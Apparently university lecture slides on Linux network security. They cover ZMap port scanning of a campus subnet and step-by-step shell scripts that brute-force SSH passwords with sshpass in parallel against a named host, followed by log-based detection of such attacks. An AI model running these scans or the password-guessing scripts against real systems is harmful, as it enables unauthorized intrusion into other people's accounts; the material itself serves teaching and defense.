Network Security In Linux: Scanning and Hacking
Review
Lex: a lexical analyzer that tokenizes an input text.
Yacc: a parser that parses and acts based on defined grammar rules involving tokens.
How to compile Lex and Yacc source files into an executable file.
Outline
A naïve way to hack:
  Background: IP networks, TCP protocols
  Network scanning
  A script for infinite SSH login attempts
Background
Internet: a set of inter-connected networks, largely relying on the TCP/IP protocols.
IP (Internet Protocol): provides an address for information routing; data is segmented into packets.
TCP (Transmission Control Protocol): runs over IP and controls how IP packets are transmitted; port numbers differentiate services.
IP
Responsible for end-to-end transmission.
Sends data in individual packets; the maximum packet size is determined by the networks, and a packet is fragmented if it is too large.
Unreliable: packets might be lost, corrupted, duplicated, or delivered out of order.
IP address
IP address: 4 bytes, e.g. 141.225.9.148 (csa.memphis.edu). Each device normally gets one; in theory there are about 4 billion available.
A subnet: a 4-byte IP / [0~32], representing a range of IP addresses, e.g. 141.225.8.1/22, a subnet at UofM including the computers in Dunn Hall.
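As an added example (not part of the slides), the shell functions below turn a subnet written as IP/mask into the range it covers, so the /22 and /24 notations used later can be checked by hand. They use only POSIX shell arithmetic; the addresses are the ones from the slides.

```shell
#!/bin/bash
# Added example: expand CIDR notation (e.g. 141.225.8.1/22) into the first
# address, last address and number of addresses in the block.
# Only the IPs from the slides are used; no network access is needed.

# ip_to_int 141.225.9.148 -> the address as a 32-bit integer
ip_to_int() {
  set -- $(printf '%s' "$1" | tr '.' ' ')
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# int_to_ip 167772161 -> 10.0.0.1
int_to_ip() {
  echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# netmask_for 22 -> 0xFFFFFC00 as an integer (the /22 netmask)
netmask_for() {
  echo $(( (0xFFFFFFFF << (32 - $1)) & 0xFFFFFFFF ))
}

# cidr_range 141.225.8.1/22 -> "141.225.8.0 141.225.11.255 1024"
cidr_range() {
  local ip=${1%/*} bits=${1#*/}
  local mask=$(netmask_for "$bits")
  local first=$(( $(ip_to_int "$ip") & mask ))
  local last=$(( first | (~mask & 0xFFFFFFFF) ))
  echo "$(int_to_ip "$first") $(int_to_ip "$last") $(( last - first + 1 ))"
}

# in_subnet 141.225.9.148 141.225.8.1/22 -> exit status 0 if the address
# lies inside the block, 1 otherwise
in_subnet() {
  local mask=$(netmask_for "${2#*/}")
  [ $(( $(ip_to_int "$1") & mask )) -eq $(( $(ip_to_int "${2%/*}") & mask )) ]
}

# Usage: the two subnets named on the ZMap slide.
cidr_range 141.225.8.1/22   # 141.225.8.0 141.225.11.255 1024
cidr_range 141.225.9.1/24   # 141.225.9.0 141.225.9.255 256
```

Note that the host part of the written address (the ".1" in 141.225.8.1/22) is ignored: the mask decides where the block starts and ends, which is why the /22 covers 141.225.8.0 through 141.225.11.255 and csa.memphis.edu (141.225.9.148) falls inside it.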
TCP port number
A port number is an application-specific software construct serving as a communications endpoint in a computer's host operating system.
2 bytes: 0 ~ 65535. Used to differentiate services.
Examples: 21 FTP, 22 SSH, 23 Telnet, 80 HTTP, 443 HTTPS
How to connect to a machine
You have an IP address and you know what you want:
  Surfing the web: send packets with the destination IP and port number 80.
  SSH login: send packets with the destination IP and port number 22.
Then wait for the data sent back.
Potential risks
As long as your machine has an IP and is connected to the Internet, everyone can try to log in to your machine: FTP login, SSH login (our focus here), Telnet login, PHP login, MySQL login.
How to SSH log in to a machine
Steps:
  You need to know that a machine has an SSH service.
  You need a username and a password.
  Then connect to the destination IP on port 22.
Example: ssh comp4272@csa.memphis.edu
The computer will create a packet consisting of the IP of csa.memphis.edu (141.225.9.148), the port number of SSH (22) and the username (comp4272).
Check if a machine supports SSH
Port scanning: scan a subnet or the whole Internet to see which machines support SSH login.
Implementation: send a login packet to an IP with port 22 and test whether there is a response.
Scanning tool in Linux: ZMap
A very recent tool, released in 2013. https://zmap.io/
Installation: download the source, compile and install. https://github.com/zmap/zmap
Ubuntu/Mint: apt-get install zmap
ZMap feature: fast. It can port scan the entire IPv4 address space from just one machine in under 1 hour.
Speed of ZMap vs Nmap: averages for scanning 1 million random hosts (chart from the ZMap authors' slides).
Internet-wide results by ZMap (1): find vulnerabilities
UPnP vulnerability disclosed by HD Moore, Jan 29 2013.
Scan results in Feb: 15.7 million publicly accessible UPnP devices, 3.4 million still vulnerable (~22%).
Internet-wide results by ZMap (2): find service availability
Outages during Hurricane Sandy, Oct-Nov 2012: more than 30% decrease (chart from the ZMap authors' slides).
Is port scan legal?
DoS attacks: definitely break the law.
Hacking into someone's computer: definitely breaks the law.
Port scan: gray area? Most likely prohibited by the ISP. Detection systems can prevent port scans.
Response results to ZMap scans: after 200 Internet-wide scans, the authors got responses asking to exclude 3,753,899 addresses (~0.11% of the IP address space). From the ZMap authors' slides.
ZMap for our use
zmap -p [port] [IP]/[mask] -i [device] -o [file]
  -p: specify a port number
  -i: can be omitted if you have just one network device
  -o: output all found IPs into a file
Example:
  zmap -p 22 141.225.8.1/22 -i eth1
  zmap -p 22 141.225.9.1/24 -i eth1
Exercise: do a port scan. Scan subnet 141.225.8.1/22 with port 80, then with port 22.
Mission
Suppose Tom has an account at a remote host: csa.memphis.edu
Username: tom
Password: don't know, but all numbers.
Task: write a shell script to get the password.
How to guess a password
Create a dictionary and try all passwords in the dictionary one by one.
How to create a dictionary: non-trivial. Social engineering: what's the user's name? What's the user's birthday? What's the user's nickname?
Guidelines to create a dictionary
Some common things about our passwords: people tend to write letters first, then numbers; people tend to write special characters (!, *, @, #, $, %) last; people tend to use birthdays, phone numbers, street numbers, zip codes; some people tend to use only numbers; many people don't like uppercase, or put uppercase first.
A password with only numbers
DON'T use a password that contains only numbers!
Create a dictionary that contains all combinations of numbers, and try them one by one.
#dict.txt (one password per line): 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ...
Try password
We can manually try the passwords in the dictionary one by one. Or, we can write a shell script to try all passwords.
[diagram: passwords from dict.txt are tried over ssh, port 22, against csa.memphis.edu as user tom]
sshpass
The ssh command does not support automatic password entry: with ssh tom@csa.memphis.edu you always need to enter the password manually.
sshpass supports entering the password on the command line.
Ubuntu/Mint install: apt-get install sshpass
Usage: sshpass -p [password] [original ssh command]
sshpass example
sshpass -p "12812" ssh tom@csa.memphis.edu
If successful, it will log in. Otherwise, it will say "Permission denied, please try again."
Try more:
sshpass -p "11111" ssh admin@csa.memphis.edu
sshpass -p "comp4272" ssh comp4272@csa.memphis.edu
Write a shell script trypassword
The arguments of the script are: first, the IP; second, the username; third, the password.
Example: ./trypassword csa.memphis.edu tom 1
The script tells you if the login is successful.
trypassword script
#!/bin/bash
# $1 - ip address to hack
# $2 - username
# $3 - password
sshpass -p "$3" ssh $2@$1 &> /dev/null
if [ $? -eq 0 ]; then
  echo "Find the password: $3"
  exit 0
fi
exit 1
Any issue?
/dev/null is a device file that discards all data written to it: http://en.wikipedia.org/wiki/null_device
The correct script
#!/bin/bash
# $1 - ip address to hack
# $2 - username
# $3 - password
echo exit | sshpass -p "$3" ssh $2@$1 &> /dev/null
if [ $? -eq 0 ]; then
  echo "Find the password: $3"
  exit 0
fi
exit 1
Put trypassword in a loop
trypassword offers one try. Our objective: try every password in the dictionary.
Put trypassword in a loop. Each time, we try a different password, until we find the correct one.
Create a script runhacking.
runhacking script
#!/bin/bash
ip=csa.memphis.edu
username=tom
dict=dict.txt
for password in `cat $dict`; do
  echo "Try password: $password"
  ./trypassword $ip $username $password
  if [ $? -eq 0 ]; then
    exit 0
  fi
done
exit 1
Any issue? Are we done?
Speed up the process
With the runhacking script above, each ./trypassword call runs to completion before the next one starts: it will hang there and wait for the result!
Our current strategy: [timeline diagram, server time vs. hacker time]
A better strategy: [timeline diagram, server time vs. hacker time]
The new runhacking script
#!/bin/bash
ip=csa.memphis.edu
username=tom
dict=dict.txt
for password in `cat $dict`; do
  echo "Try password: $password"
  ./trypassword $ip $username $password &
  if [ $? -eq 0 ]; then
    exit 0
  fi
done
exit 1
$? is always 0, how to handle this?
& makes the command run in the background (a process is created to run the command).
How to track status
[diagram: runhacking launches several ./trypassword processes]
How can we know that a particular process finds the password in the runhacking script? There are multiple ways.
If the password is found, create a file
#!/bin/bash
# trypassword script:
# $1 - ip address to hack
# $2 - username
# $3 - password
# $4 - the filename to save the found password
echo "exit" | sshpass -p "$3" ssh $2@$1 &> /dev/null
if [ $? -eq 0 ]; then
  echo "Find the password: $3"
  echo $3 > $4
  exit 0
fi
exit 1
The final runhacking script
#!/bin/bash
ip=csa.memphis.edu
username=tom
dict=dict.txt
pwfile=password
rm -f $pwfile
for password in `cat $dict`; do
  echo "Try password: $password"
  ./trypassword $ip $username $password $pwfile &
  # If the password file is created, we find it and exit
  if [ -f $pwfile ]; then
    exit 0
  fi
done
exit 1
Discussions
Hacking is ILLEGAL! Running this script to connect to other people's computers is illegal!
The other computer can have a record of your IP and trace you back.
You can try the script on csa.memphis.edu.
How to prevent this very naïve hacking?
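As an added example (not part of the slides), here is the defender's side of the question above: the loop from runhacking leaves one "Failed password" line per attempt in sshd's log, all from the same source address, so counting failures per source is enough to spot it. The log lines are constructed in the format OpenSSH writes to /var/log/auth.log, the source addresses come from the RFC 5737 documentation ranges, and the host name csa is made up for the sample.

```shell
#!/bin/bash
# Added example: count failed SSH logins per source address in sshd log
# lines and flag sources that exceed a threshold.  SAMPLE_LOG is a
# constructed excerpt (constructed addresses and process ids), not a real log.
SAMPLE_LOG='Mar  3 10:01:02 csa sshd[2101]: Failed password for tom from 203.0.113.5 port 51234 ssh2
Mar  3 10:01:03 csa sshd[2102]: Failed password for tom from 203.0.113.5 port 51235 ssh2
Mar  3 10:01:03 csa sshd[2103]: Failed password for tom from 203.0.113.5 port 51236 ssh2
Mar  3 10:01:04 csa sshd[2104]: Failed password for tom from 203.0.113.5 port 51237 ssh2
Mar  3 10:01:04 csa sshd[2105]: Failed password for tom from 203.0.113.5 port 51238 ssh2
Mar  3 10:01:05 csa sshd[2106]: Failed password for tom from 203.0.113.5 port 51239 ssh2
Mar  3 10:03:10 csa sshd[2107]: Failed password for invalid user admin from 198.51.100.7 port 40001 ssh2
Mar  3 10:05:40 csa sshd[2110]: Accepted publickey for alice from 192.0.2.9 port 40010 ssh2'

# failed_logins_by_source LOGTEXT -> one "count ip" line per source,
# most failures first.  Only "Failed password" lines are counted; the
# "from" keyword is located by position so "invalid user" lines match too.
failed_logins_by_source() {
  printf '%s\n' "$1" |
    awk '/sshd\[[0-9]+\]: Failed password for/ {
           for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1)
         }' |
    sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# suspicious_sources LOGTEXT THRESHOLD -> addresses with at least
# THRESHOLD failed logins, the ones a log monitor would block.
suspicious_sources() {
  failed_logins_by_source "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

# Usage: five failures is the (arbitrary, assumed) threshold here.
echo "Failed logins per source:"
failed_logins_by_source "$SAMPLE_LOG"
echo "Sources to block (>= 5 failures):"
suspicious_sources "$SAMPLE_LOG" 5
```

On the sample, 203.0.113.5 shows six failures for the same user within a few seconds, which is exactly the signature of a dictionary loop, while the single failure from 198.51.100.7 stays under the threshold. This per-source counting is what tools such as fail2ban automate by adding a firewall rule for the flagged address; the other part of the defence is not to accept guessable passwords at all, e.g. by setting PasswordAuthentication no in sshd_config and using keys, and by lowering MaxAuthTries so each connection allows only a few attempts.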
Summary
TCP/IP networks: IP address and TCP port.
ZMap: a very fast Internet scanner.
A naïve script to try passwords.
Hacking is ILLEGAL! How to defend?